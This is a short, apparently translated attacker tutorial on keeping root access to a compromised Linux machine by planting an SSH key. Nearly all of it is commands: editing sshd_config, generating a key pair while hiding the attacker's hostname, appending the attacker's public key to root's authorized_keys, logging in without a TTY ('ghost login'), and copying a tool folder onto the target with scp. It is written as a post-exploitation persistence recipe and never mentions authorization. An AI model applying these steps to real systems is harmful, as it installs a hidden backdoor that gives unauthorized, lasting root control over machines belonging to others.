0x00 premise
- Old things from the past, take out the water article
- Generally, through Rce, privilege escalation, etc., get the root privilege of the target linux
- The main reason is that there is no password, the hash cannot be run out, and the machine cannot go out of the network normally
- you can try the forward link
0x01 First target host, modify target Ssh service configuration
Enable ssh certificate login and restart the SSH service
echo RSAAuthentication yes >> /etc/ssh/sshd_config
echo PubkeyAuthentication yes >> /etc/ssh/sshd_config
systemctl restart sshd
0x02 Generate key on local linux
# ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa
Note: This step is best to go to a pure Linux build, because this key will expose your hostname
//找见id_rsa.pub自行拷贝出来
ls -al /root/.ssh/
cp /root/.ssh/id_rsa.pub /home/xxxx/Desktop/
//赋于权限
chmod 777 /home/xxxx/Desktop/id_rsa.pub
There are two files in the /root/.ssh/folder:
id_rsa(私钥)
id_rsa.pub(公钥)
0x03 The linux target machine writes the public key
-
Upload the public key to the intranet linux by yourself, and save it in the /root/.ssh/ directory, change the file name to authorized_keys, or use echo to append the command execution
-
If the authorized_keys file already exists in the target, just add it to the end
-
Note: "Backup" the original authorized_keys before operation again, in case of emergency.
# echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8Zrks74SYQ4JzKFvYPyL2tG+Scx/y/gIDk5znJF6XKjJ2MFS7RfsjKqpRk7bb+bDpgb5awiMzMOUgwBDheJKerji9/FD+jHEI133ejCZphiPL0+OItLdl7uUt+NFMMPNeXh9lmDOwApxVg54xhDjyzWYaV6xQgvWuZK+6qNBD1TW2/zXImeHpC+L37KQSgFvtxyOiYw/Uq/Caoa9VkcFsUsJ1ftmKSh7unkEJiJAHpzmI0SquNdrgTJ5AiVclQbTa8viyl+irXYjUyvxWKCqBhMhuQQFEMRdViVStgSRoVREEH361J7T7oCC0rJE2XV8MlejXZGi7if34gYHYgyBKvEQ9/Ff+fkQV5LXdZLkC0h3wOBLV9lWwMamlFSjJMTSBlZP1syHYV/X1YNO76SmLUUi48PwDQa52g0tI2TusDmjgARWxwhCndu463dwbCcGjfHnSEAWEB2WGJcKOcpfGLUrdDt9My/d26dfMTNdlaw+kdnDVlYvk0qnyBBZhyfE= [email protected] >> /root/.ssh/authorized_keys
0x04 ghost login
ssh -T [email protected] /usr/bin/bash -i
0x05 Use Scp to transfer files without password
scp -P 22 -r /root/fsacn [email protected]:/usr/tmp/fsacn